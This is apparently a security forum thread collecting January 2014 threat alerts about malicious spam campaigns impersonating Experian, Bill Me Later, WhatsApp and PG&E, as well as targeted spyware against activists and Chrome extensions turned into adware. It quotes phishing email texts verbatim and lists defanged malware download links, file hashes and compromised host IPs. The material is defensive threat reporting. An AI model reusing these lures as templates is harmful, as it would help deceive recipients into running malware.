- http://searchengineland.com/local-se...ackings-181933
Jan 16, 2014 - "... Without offering any substantive comments about the situation Google appears to have cleaned up the problem and mostly if not entirely restored the proper links. There’s been no explanation forthcoming about how this might have happened from the company, though Google acknowledged the incident..."

[AplusWebMaster]

FYI...

Fake Experian Credit Report Malicious Spam
- http://threattrack.tumblr.com/post/7...malicious-spam
Jan 17, 2014 - "Subjects Seen:
IMPORTANT - A Key Change Has Been Posted
Typical e-mail details:
A key change has been posted to one of your three national Credit Reports. Each day we monitor your Experian®, Equifax and TransUnion Credit Reports for key changes that may help you detect potential credit fraud or identity theft. Even if you know what caused your Report to change, you don’t know how it will affect your credit, so we urge you to do the following:
View detailed report by opening the attachment.
You will be prompted to open (view) the file or save (download) it to your computer.
For best results, save the file first, then open it in a Web browser.
Contact our Customer Care Center with any additional questions.
Note: The attached file contains personal data.

Malicious File Name and MD5:
Credit_Report_4287362163.zip (1B1C6223EC52CE2E2B8CE6C117A15ADA)
Credit_Report_4287362163.exe (B4101936ED3C8BC09F994223A39E5FE2)

Screenshot: https://31.media.tumblr.com/5f9f8502...VC01r6pupn.png

Tagged: Experian, Upatre
___

Threat Outbreak Alerts
- http://tools.cisco.com/security/cent...utbreak.x?i=77
Fake Photograph Sharing Email Messages - 2014 Jan 17
Fake Court Notice Email Messages - 2014 Jan 17
Fake Fax Message Receipt Email Messages - 2014 Jan 17
Fake Credit Report Email Messages - 2014 Jan 17
Fake Fax Message Delivery Email Messages - 2014 Jan 17
Fake Job Offer Notification Email Messages - 2014 Jan 17
Fake Account Payment Information Email Messages - 2014 Jan 17
Fake Failed Delivery Notification Email Messages - 2014 Jan 17
Fake Fax Message Delivery Email Messages - 2014 Jan 17
Fake Incoming Money Transfer Notification Email Messages - 2014 Jan 17
Fake Invoice Statement Attachment Email Messages - 2014 Jan 17
Fake Delivery Express Parcel Notification Email Messages - 2014 Jan 17
Fake Anti-Phishing Email Messages - 2014 Jan 17
Malicious Personal Pictures Attachment Email Messages - 2014 Jan 17
Fake Product Order Notification Email Messages - 2014 Jan 17
(More detail and links at the cisco URL above.)

[AplusWebMaster]

FYI...

Spyware attacks against U.S. bloggers ...
- http://www.welivesecurity.com/2014/0...rs-eff-claims/
20 Jan 2014 - "A single anti-government blog post is enough to trigger personalized spyware attacks from hacker groups supporting the Vietnamese communist state, which the Electronic Frontier Foundation claims* targets anti-government bloggers – even those in other countries – with malware, including its staff, and Californian activists... The new campaign, though, used highly targeted attacks aimed at specific critics of the government – including EFF staff... The -malware- was sent out as a link to a Google document, and was sent in emails tailored to targets – the activists were invited to a conference, and an Associated Press journalist was offered a white paper from Human Rights Watch..."
* https://www.eff.org/deeplinks/2014/0...-gets-personal
Jan 19, 2014

- https://net-security.org/malware_news.php?id=2679
20.01.2014
___

PG&E SPAM - Malware distribution campaign
- https://isc.sans.edu/diary.html?storyid=17459
Last Updated: 2014-01-19 18:41:43 UTC - "Starting about 10 days or so ago, a Spam campaign began targeting Pacific Gas and Energy (PG&E), a large U.S. energy provider. PG&E has been aware of this campaign for about a week, and has informed its customers.
> http://www.pgecurrents.com/2014/01/0...-emails-calls/
... these emails look quite professional and the English is good. The only real issue in the email being formatting of some of the currency figures.
> https://isc.sans.edu/diaryimages/ima...EStatement.jpg
The header revealed that it was sent from user nf@ www1 .nsalt .net using IP 212.2.230.181, most likely a compromised webmail account. Both the from and the reply-to fields are set to do_not_reply@ nf .kg, an email address that bounces. The 212.2.230.181 IP, the nf .kg domain and the nsalt .net domain - all map to City Telecom Broadband in Kyrgyzstan (country code KG)... the goal of this particular campaign seems to be malware distribution. The "click here" link in the two samples point to different places
hxxp ://s-dream1 .com/message/e2y+KAkbElUyJZk38F2gvCp7boiEKa2PSdYRj+YOvLI=/pge
hxxp ://paskamp .nl/message/hbu8N3ny7oAVfvBZrZWLSrkYv2kTbwArk3+Tspbd2Cg=/pge
Both of these links are now down, but when they were alive they both served up PGE_FullStatement_San_Francisco_94118.zip which contained a Windows executable... Virustotal has a 5/48 detection rate indicating this is most likely a Trojan Dropper:
> https://isc.sans.edu/diaryimages/ima...ustotalpge.jpg ..."

- https://www.virustotal.com/en/ip-add...1/information/
___

Spammers buy Chrome extensions - turn them into adware
- https://www.computerworld.com/s/arti...em_into_adware
Jan 20, 2014 - "... At least two Chrome extensions recently sold by their original developers were updated to inject ads and affiliate links into legitimate websites opened in users' browsers. The issue first came to light last week when the developer of the "Add to Feedly" extension, a technology blogger named Amit Agarwal, reported that after selling his extension late last year to a third-party, it got transformed into adware... A second developer, Roman Skabichevsky, confirmed Monday that his Chrome extension called "Tweet This Page" suffered a similar fate after he sold it at the end of November... According to the Chrome Web Store developer program policies, advertising is allowed in apps hosted in the store, but there are strict criteria for displaying ads on third-party websites..."
___

Bill Me Later Payment Spam
- http://threattrack.tumblr.com/post/7...r-payment-spam
Jan 20, 2014 - "Subjects Seen:
Thank you for scheduling a payment to Bill Me Later
Typical e-mail details:
Dear Customer,
Thank you for making a payment online! We’ve received your
Bill Me Later® payment of $1201.39 and have applied it to your account.
For more details please check attached file
Summary:
Your Bill Me Later Account Number Ending in: 0759
You Paid: $1201.39
Your Payment Date*: 01/20/2014
Your Payment Confirmation Number: 042075773771348058

Malicious File Name and MD5:
PP_03357442.zip (93C0326C3D37927E4C38C90016C7F14C)
PP_03357442.exe (2B68D8CC7CB979EA9A1405D32E30A00A)

Screenshot: https://31.media.tumblr.com/dcb80e6f...Q2R1r6pupn.png

Tagged: bill me later, Upatre

- http://blog.dynamoo.com/2014/01/than...ayment-to.html
20 Jan 2014 - "This -fake- Bill Me Later spam has a malicious attachment:
Date: Mon, 20 Jan 2014 14:23:08 +0000 [09:23:08 EST]
From: Bill Me Later [service@ paypal .com]
Subject: Thank you for scheduling a payment to Bill Me Later
BillMeLater
Log in here
Your Bill Me Later statement is now available!
Dear Customer,
Thank you for making a payment online! We've received your
Bill Me Later® payment of $1603.57 and have applied it to your account.
For more details please check attached file
Summary:
Your Bill Me Later Account Number Ending in: 0266
You Paid: $1603.57
Your Payment Date*: 01/20/2014
Your Payment Confirmation Number: 971892583971968191 ...

Screenshot: https://lh3.ggpht.com/-g4CABaa5Ka4/U...illmelater.png

Attached is an archive file PP_03357442.zip which in turn contains a malicious executable PP_03357442.exe which has a VirusTotal detection rate of just 4/45*. Automated analysis tools... show an attempted connection to jatit .org on 72.9.158.240 (Colo4, US) which appears to be a legitimate (but presumably compromised) site."
* https://www.virustotal.com/en-gb/fil...is/1390235463/
___

Fake WhatsApp "A friend of yours has just sent you a pic" SPAM
- http://blog.dynamoo.com/2014/01/what...just-sent.html
20 Jan 2014 - "This -fake- WhatsApp spam has a malicious attachment:
Date: Mon, 20 Jan 2014 06:23:28 -0500 [06:23:28 EST]
From: WhatsApp [{messages@ whatsapp .com}]
Subject: A friend of yours has just sent you a pic
Hey!
Someone you know has just sent you a pic in WhatsApp. Open attachments to see what it is.
2013 WhatsApp Inc

Screenshot: https://lh3.ggpht.com/-ogFWbF6oOwk/U...0/whatsapp.png

Attached to the message is a an archive file IMG9900882.zip which in turn contains a malicious exectuable IMG9900882.exe which has a VirusTotal detection rate of 20/49*... analysis gives few clues as to what the malware does, other automated analysis tools are inconclusive."
* https://www.virustotal.com/en/file/a...is/1390244298/